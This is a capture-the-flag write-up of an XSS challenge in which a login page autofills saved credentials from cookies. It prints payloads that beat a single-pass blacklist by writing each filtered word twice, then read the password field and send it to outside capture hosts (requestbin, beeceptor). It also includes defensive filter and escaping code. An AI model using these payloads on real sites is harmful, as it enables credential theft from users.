Preface
Solution
login.js
if (document.cookie && document.cookie != '') {
    // Split "k=v; k2=v2" into a lookup table keyed by cookie name
    var cookies = document.cookie.split('; ');
    var cookie = {};
    for (var i = 0; i < cookies.length; i++) {
        var arr = cookies[i].split('=');
        var key = arr[0];
        cookie[key] = arr[1];
    }
    // Pre-fill the login form from the saved "user" and "psw" cookies
    if (typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined") {
        document.getElementsByName("username")[0].value = cookie['user'];
        document.getElementsByName("password")[0].value = cookie['psw'];
    }
}
Input is filtered by replacement, but note that the filter is non-recursive: each entry of the blacklist is stripped in turn, and the result is never re-checked before moving on to the next entry. In that situation a double-write bypass works.
<scriphostt>alert(1)</scriphostt>
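As an added illustration (not code from the challenge or the original writeup), here is a single-pass blacklist filter of the kind described above, beside a fixpoint version and proper HTML output encoding; the blacklist is an assumption, since the challenge's real list is not shown.

```javascript
// Assumed blacklist (constructed for this example; the challenge's list is unknown).
// Ordering matters for the single-pass filter: entries stripped later can
// "glue" an earlier entry back together.
const BLACKLIST = ["script", "document", "src", "input", "host", "cookie"];

// Single-pass filter as described in the writeup: each word is removed once,
// in order, and the output is never re-checked.
function naiveFilter(s) {
  let out = s;
  for (const word of BLACKLIST) {
    out = out.split(word).join("");
  }
  return out;
}

// Fixpoint filter: repeat the pass until nothing changes, so a word that
// reappears after another was removed is stripped as well.
function fixpointFilter(s) {
  let prev;
  let out = s;
  do {
    prev = out;
    for (const word of BLACKLIST) {
      out = out.split(word).join("");
    }
  } while (out !== prev);
  return out;
}

// Contextual output encoding: the fix that does not depend on a word list.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Detection helper: a filter is broken if its own output still contains a
// blacklisted word.
function containsBlacklisted(s) {
  return BLACKLIST.some((w) => s.includes(w));
}

// Constructed sample: the double-written tag from the writeup.
const sample = "<scriphostt>alert(1)</scriphostt>";
console.log(naiveFilter(sample));      // the filtered output re-forms the tag
console.log(fixpointFilter(sample));   // the tag name no longer survives
console.log(escapeHtml(sample));       // rendered as text, not markup
```

Even the fixpoint version only blocks listed words, which is why encoding the value for its output context is the defence that actually holds.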
It feels like this should be an XSS challenge.
Taken together with the contents of login.js, the page roughly just reads the cookies back into the form.
Following an existing writeup, use http://http.requestbin.buuoj.cn/ to capture the request:
<input type="text" name="username">
<input type="password" name="password">
<script src="./js/login.js"></script>
<script>
var psw = document.getElementsByName("password")[0].value;
document.location="http://http.requestbin.buuoj.cn/1ihbkir1/?psw="+psw;
</script>
Splice "cookie" into the filtered words to bypass the replacement:
<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
var psw = docucookiement.getcookieElementsByName("password")[0].value;
docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1ihbkir1/?psw="+psw;
</scrcookieipt>
Waited a long time and my XSS still didn't fire, speechless.
September 12, 2021, 12:28:43
The target machine can reach the internet, so just use beeceptor:
<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
var psw = docucookiement.getcookieElementsByName("password")[0].value;
docucookiement.locacookietion="https://ad456g45asd.free.beeceptor.com/?psw="+psw;
</scrcookieipt>